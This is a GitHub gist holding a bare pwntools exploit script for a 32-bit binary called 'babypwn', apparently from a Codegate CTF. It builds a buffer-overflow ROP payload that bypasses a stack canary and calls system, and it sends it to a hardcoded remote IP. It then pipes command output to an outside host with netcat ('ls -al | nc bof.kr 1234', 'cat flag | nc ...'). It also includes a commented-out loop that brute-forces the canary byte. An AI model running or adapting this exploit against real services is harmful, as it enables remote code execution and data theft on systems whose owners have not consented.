Skip to content

Instantly share code, notes, and snippets.

@junorouse
Created February 12, 2017 05:49
Show Gist options
  • Save junorouse/4bd94963a57093a2f7ba92cf483388c9 to your computer and use it in GitHub Desktop.
Save junorouse/4bd94963a57093a2f7ba92cf483388c9 to your computer and use it in GitHub Desktop.
"""
>>> e = ELF("./babypwn")
[*] '/media/psf/Home/junoim/3onedayonepwn/codegate/bp/babypwn'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE
"""
from pwn import *
send = 0x08048700
s_send = 0x080488B1
s_recv = 0x08048907
fd = 0x0804B1B8
ppr = 0x08048EEE
fuck = 0x08048A97
payload = "A"*40+"\x00\x6e\x9b\xd3"
payload += "BBBB"
payload += "BBBB"
payload += "BBBB"
payload += p32(s_recv)
payload += p32(ppr)
payload += p32(0x0804B080)
payload += p32(0xff)
payload += p32(0x08048620) # system
payload += p32(fuck)
payload += p32(0x0804B080)
print len(payload)
# 0 1 2
r = remote("110.10.212.130", 8889)
print r.recv()
r.sendline("1")
print r.recv()
print r.recv()
r.send(payload)
print r.recv()
print r.recv()
r.sendline("3")
r.sendline("ls -al | nc bof.kr 1234")
r.sendline("ls -al | nc bof.kr 1234")
r.sendline("ls -al | nc bof.kr 1234")
#
# for i in range(0, 0xff):
# try:
# r = remote("110.10.212.130", 8889)
# print r.recv()
# r.sendline("1")
# print r.recv()
# print r.recv()
# r.send(payload + chr(i))
# print "DONE " + str(i)
# print r.recv()
# print r.recv()
# r.sendline("3")
# print r.recv()
# print "FIND CANARY: " + str(i)
# exit(0)
# except:
# continue
# cat flag | nc bof.kr 1234
#
#
# r.sendline("3")
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment